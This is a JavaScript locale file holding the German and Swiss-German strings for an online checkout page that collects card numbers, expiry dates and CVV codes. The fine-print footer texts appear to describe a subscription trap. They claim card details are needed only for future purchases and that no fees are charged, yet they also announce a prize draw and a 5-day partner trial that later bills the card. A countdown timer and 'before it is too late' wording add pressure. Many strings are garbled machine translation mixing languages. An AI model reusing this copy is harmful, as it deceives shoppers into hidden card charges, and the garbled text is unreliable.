var new_date = new Date(
  new Date().setDate(new Date().getDate() + 30)
).toLocaleDateString('ch');
const siteTitle = 'Bestellung abschließen';

export default {
  mainTexts: {
    siteTitle: `${siteTitle}`,
    formTitle1: 'Geben Sie Ihre Informationen ein',
    formTitle2: 'Eine Bestellung aufgeben',
    btnForm: 'Continua',
    btnForm2: 'Zahlen',
    priceText1: 'Zahlung',
    priceText2: 'Insgesamt',
    footerTitle: 'Online bezahlen',
    footerText: 'Bestätigen Sie mit Ihrer Kreditkarte',
    shippingInfoText: 'Versand- & Rechnigsinformazioone',
    paymentInfoText: 'ZAHLIGSINFORMATIONE',
    agreengText:
      "Durech Drücke uf 'Wiiter', bestätigi, dassi d'Aagschtelltebedingige, d'Datäschutzrichtlinie gläse, igwilligt und akzeptiert han und dassi mindeschtens 18 Johr alt bi.",
    checkboxText:
      "I stimm zue, Newsletter-Benochrichtigunge, Aagebot und Kommunikazioonsdienst z'erhalte.",
    bigFooterText: `Dank Ihrer Mitgliedschaft nehmen Sie auch an unserem Wettbewerb teil, um den ${siteTitle} zu gewinnen. Unter jeweils 600 Teilnehmern ermitteln wir einen Gewinner. Der nächste Gewinner wird am ${new_date} ausgewählt und direkt per E-Mail benachrichtigt. Sollte die Prämie nicht vorrätig sein, erhält der Gewinner stattdessen ein ähnliches Produkt mit gleichem oder höherem Wert.`,
    bigFooterText1: `Wir stellen sicher, dass unsere Mitglieder eine detaillierte Historie der Transaktionen erhalten und sie dadurch wissen, wofür sie bezahlen.“ Kreditkarteninformationen werden nur benötigt, um zukünftige Einkäufe zu erleichtern. Auf Ihrer Kreditkartenabrechnung werden keine Gebühren erhoben, wenn Sie nicht auf die PREMIUM-Mitgliedschaft upgraden und keinen Kauf tätigen.`,
    bigFooterText2: `Wenn Sie diesem Service beitreten, erhalten Sie eine 5-tägige Testversion des Programms unseres Partners. Wenn Sie ein Abonnement über den 5-tägigen Testzeitraum hinaus fortsetzen, wird Ihre Kreditkarte mit einem Betrag belastet, der je nach Tarifwahl variiert. Wenn Ihr Beitrag von Ihrer Kreditkarte oder einer anderen Zahlungsmethode abgebucht wird, haben Sie Zugriff auf diese Dienste, die ausschließlich Mitgliedern der Website unseres Partners vorbehalten sind.`,
    subtotalText: 'Zwüschäsumme',
    amountText: 'Betrag zum Bezahle',
    shippingText: 'Versand',
    totalText: 'Totale',
    freeText: 'Gratis',
    countryLabel: 'Land',
    country: 'Switzerland',
  },
  home: {
    placeholder: {
      firstName: 'Vorname',
      lastName: 'Nachname',
      email: 'Email',
      phone: 'Telefon',
      city: 'Stadt',
      address: 'Adresse',
      zip: 'Postleitzahl',
      continue: 'Weiter',
      name: 'Der Name',
    },
    cardNumber: 'Kartennummer',
    expirationDate: 'Haltbarkeitsdatum',
    name: 'Name',
    month: 'Monat',
    year: 'Jahr',
    cvv: 'CVV',
    confirmPayment: 'Eine zahlung tätigen',
    labelNumber: 'Die Kartennummer:',
    labelMonth: 'Ablaufdatum:',
    source:
      'Wir verwenden 3D-Sicherheit, um Ihren Kauf zu verifizieren. Möglicherweise erscheint ein neues Fenster zur Transaktionsüberprüfung ',
    timer: 'Verbleibende Zeit bis zur Bezahlung der Bestellung',
  },
  validation: {
    requireEmail: 'Die E-Mail-Adresse ist vuot',
    validEmail: 'Die E-Mail wurde nicht validiert',
    requirePhone: 'Es ist nur telefonisch möglich',
    minPhone: 'Das Telefonfeld muss aus mindestens 10 Zeichen bestehen.',
    requireFirstName: 'Es nennt obbligatorio',
    validFirstName: 'Es ist kein gültiger Vorname.',
    requireLastName: 'Ich bin am reichsten da, campo del cognome.',
    validLastName: 'Das Feld Nachname ist erforderlich.',
    requireCity: 'Stadt ist ein Pflichtfeld.',
    validCity: 'Das Stadtfeld ist ungültig',
    requireAddress: 'Es ist ein Adressfeld ist obligatorisch.',
    validAddress: 'Das Adressfeld ist ungültig.',
    requireZip: 'Das Pflichtfeld Postleitzahl.',
    validZip: 'Es ist eine Campo-Postleitzahl, die nicht gültig ist',
    requireCard: 'Es gibt eine Knorpelnummer',
    minCard: 'Nicht genug Symbole.',
    validCard: 'Es gibt keine gültige Kartennummer',
    requireMonth: 'Das Lager der Verfallsmassen und Pflicht.',
    requireYear: 'Ablaufdatum und Pflichtfeld für das Jahr.',
    requireName: 'Das Namensfeld ist erforderlich.',
    validName: 'Das Feld des Namens ist ungültig',
    requireCvv: 'Es ist ein Lebenslauf, der verpflichtend ist.',
    validCvv: 'Das Feld cvv no ist gültig.',
    minFirstName: 'Das Vorname-Feld muss aus mindestens 3 Zeichen bestehen.',
    minLastName: 'Das Nachname-Feld muss aus mindestens 3 Zeichen bestehen.',
    minCity: 'Das Stadtfeld muss aus mindestens 3 Zeichen bestehen.',
    minAddress: 'Das Adressfeld muss aus mindestens 3 Zeichen bestehen.',
    minZip:
      'Das Feld für die Postleitzahl muss aus mindestens 3 Zeichen bestehen.',
    minName: 'Das Namensfeld muss aus mindestens 3 Zeichen bestehen.',
    minCvv: 'Das CVV-Feld muss aus mindestens 3 Zeichen bestehen.',
    specialFirstName:
      'Der Vorname des Feldes darf keine Sonderzeichen enthalten',
    specialLastName: 'Das Feld Nachname darf keine Sonderzeichen enthalten',
    specialName: 'Der Feldname darf keine Sonderzeichen enthalten',
    specialCity: 'Das Feld city darf keine Sonderzeichen enthalten',
  },
  mask: {
    phone: '+41 999 999 99 99',
    zip: '99999',
    creditCard: '9999 9999 9999 9999',
    cvv: '9999',
  },
  getInTouch: {
    title: 'IN KONTAKT KOMMEN',
    firstName: 'Vorname',
    lastName: 'Nachname',
    email: 'E-mail',
    msg: 'Botschaft',
    send: 'Senden',
    alreadyRegistered: 'Sie haben sich bereits registriert',
    unsubscribeLink: 'Link abbestellen',
    worktime: 'Callcenter Arbeitet von 10 bis 17 Uhr',
    phone: 'Telefon: Sofia +359 2 437 4207',
  },
  footer: {
    title: 'Mach mit, bevor es zu spät ist',
    terms: 'Allgemeine Geschäftsbedingungen',
    privacy: 'Datenschutzrichtlinie',
    contact: {
      title: 'Kontaktiere uns',
      text: 'Wir sind verpflichtet, jedem unserer geschätzten Kunden einen ausgezeichneten Kundenservice zu bieten. Wenn Sie Fragen oder Bedenken haben, zögern Sie bitte nicht, einen unserer professionellen Kundendienstmitarbeiter zu kontaktieren.',
    },
  },
};
